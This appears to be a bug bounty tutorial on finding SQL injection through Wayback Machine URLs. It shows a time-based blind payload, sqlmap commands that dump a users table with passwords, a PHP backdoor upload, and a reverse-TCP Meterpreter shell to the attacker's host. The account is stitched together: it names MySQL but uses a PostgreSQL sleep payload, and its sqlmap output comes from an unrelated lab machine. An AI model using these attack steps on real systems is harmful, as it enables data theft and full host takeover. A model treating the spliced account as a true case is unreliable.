BOOK THIS SPACE FOR AD
ARTICLE ADThis article discusses a methodological approach in a bug bounty program, focusing on SQL Injection exploitation by leveraging URL archives from the Wayback Machine. In the context of bug bounties, finding SQL Injection vulnerabilities is one of the common techniques used by security researchers to reveal security holes in web applications. This article provides a step-by-step guide to locate, identify, and exploit such vulnerabilities using Wayback URLs, which allow researchers to view old versions of web pages to reveal potential security holes in the past. This methodology offers practical strategies for security researchers to increase the chances of finding relevant bugs and improve the response from bug bounty programs.
Archived web pages refer to copies or snapshots of websites captured at specific points in time. These snapshots are created and stored by web archiving services, such as the Wayback Machine by the Internet Archive. Archiving web pages allows for the preservation of web content, enabling users to access and reference past versions of websites.
Discovering waybackurls
Waybash is a command-line tool that extracts URLs from the Wayback Machine’s archived web pages. It allows you to retrieve historical snapshots of websites and gather valuable information for bug bounty recon and other security testing purposes. Here’s how you can use Waybackurls:
you can use the following command to save the output to a file called urls.txt :
bash waybash.sh -help
Usage: ./wayback.sh [option]
Options:
1) Filter by Date Range
2) Include HTTP Status Codes
3) Filter by MIME Type
4) Track URL Changes Over Time
5) Download Archived Pages
6) Enable Verbose Mode
-help Show this help menu
-exit Exit the script
Description:
This script retrieves URLs archived in the Wayback Machine and offers features
such as filtering by date range, tracking changes, including HTTP status codes,
filtering by MIME type, and more.
Now you can use grep to find some sensitive endpoints and informations disclosed via archives
you can use any keywords like Admin, user, email, token, keys.. etc.
Finding parameters from Waybash
By discovering and analyzing parameters, you can assess how they are handled, validated, or sanitized by the application. This can lead to the identification of vulnerabilities such as SQL injection, cross-site scripting (XSS), command injection, path traversal, and more.
grep -oP ‘(?<=\?|&)\w+(?==|&)’ targets.txt | sort -u
Let’s take the target domain as redacted.com.I started with visiting the target domain like a normal user of the web application. The web application don’t have much features and functionality to test with but has some products that can be viewed and searched.Then I have used waybash to find out all the URLs associated with that domain. Typically, I have used waybackurls tool to find out URLs via Command-line.$ bash waybash.sh > save urls.txt Now, I have all the urls saved in a file called urls.txt. I start with gathering the interesting URLs such as URLs with id parameter, redirect parameter, url parameter, etc. Sometimes, I also use the following wordlist to FUZZ for parameters on interesting subdomains “ https://github.com/PortSwigger/param-miner/blob/master/resources/params ”$ cat urls.txt | grep "id=" | anew temp-sqli.txtFrom the file temp-sqli.txt I found an interesting URL something like https://www.redacted.com/?attachment_id=123 .temp-sqli.txt File Content
I started with appending a single quote(‘) and double quote(“) at the end of the URL but didn’t found any SQL Error or DB Error. But as this looks interesting to me, I wanted to give a try for all type of SQL Injections.https://www.redacted.com/?attachment_id=123'https://www.redacted.com/?attachment_id=123"From the wappalyzer, I found the web application is using the MySQL DB. I wanted to try SQLi, so I gathered some SQLi payloads and tried them on the above URL.
Wappalyzer Result
I have used Burp Suite to send the request and check the time difference if any while executing Time based SQLi payloads. Though I can use browser to check, but for the PoC purpose I have used Burp Suite. Below request has no SQLi payload and taking less time in generating response.Request 01 — Without SQL Payload
I have found a payload " AND 4564=(SELECT 4564 FROM PG_SLEEP(11)) OR "04586"="4586-- that worked for me and successfully had a sleep of 11 seconds on the web application indicating the successful execution of Time-based Blind SQL Injection attack. The complete URL with payload looks like:$ curl https://www.redacted.com/?attachment_id=123" AND 4564=(SELECT 4564 FROM PG_SLEEP(11)) OR "04586"="4586--Request 02 — With SQL Payload
From the above screenshot, It was clearly found the increment in time taken to complete the request with the SQLi payload which confirms the presence of the vulnerability. Also the web application was taking time while loading on the web browser.Request 03 — Automaticly find Vulnerability With SQLMap Custom Payload
At this stage, we will use SQLMap to automatically detect SQL Injection vulnerabilities by utilizing a custom payload. SQLMap is one of the popular automation tools used in penetration testing, especially for exploiting SQLi vulnerabilities. By configuring a custom payload, this tool can find vulnerable parameters that allow SQL Injection execution.
In this method, security researchers will point SQLMap to the target URL and use a specially designed payload to speed up the detection and exploitation process. This saves time and increases the effectiveness in finding and exploiting loopholes that may not be visible with manual testing. The end result will provide information on the security status of the tested parameters and provide further recommendations for deeper exploitation.
root@pwn0sec:/pentest/database/sqlmap# ./sqlmap.py -r urls.txt --random-agent --no-cast --threads=7 --timeout=10 --dbs -v3sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 22:26:52
[22:26:52] [INFO] using '/pentest/database/sqlmap/output/192.168.1.102/session' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[*] shutting down at: 22:26:52
Yes, we knew this at all. Dump the database engine, the version, and the operating system information.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -r targets.txt --dbs---------------------------------------------------------------------
[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb
Dump the database, yes..SQLMap always do the great stuff!
root@bt:/pentest/database/sqlmap# ./sqlmap.py -r vuln.txt -D webappdb --tables[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup12
Database: webappdb
Table: users
[3 entries]
+---------+----+--------+----------+
| country | id | name | password |
+---------+----+--------+----------+
| ID | 1 | admin | 123456 |
| ID | 2 | secret | password |
| SG | 3 | backup | backup12 |
+---------+----+--------+----------+
[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.102'
[*] shutting down at: 22:36:54
SQLMap do a great job so far ? Next, take over the system!!
root@bt:/pentest/database/sqlmap#./sqlmap.py -r vuln.txt --os-shell[22:51:25] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP (default)
[2] PHP
[3] JSP
>2
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('http://192.168.1.102:80/tmpuduwd.php')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to 'http://192.168.1.102:80//tmpbpjbr.php' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
---
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
---
os-shell>
This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.
When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up ?
I will skip some information here, because it is too long to be dropped here.
— -the process before this line was creating the php shell and upload to document root — –
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>1
which is the local address? [192.168.1.100]
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.100:31503
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561)
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter> Server username: NT AUTHORITYSYSTEM
meterpreter>
meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:>
OS Pwned!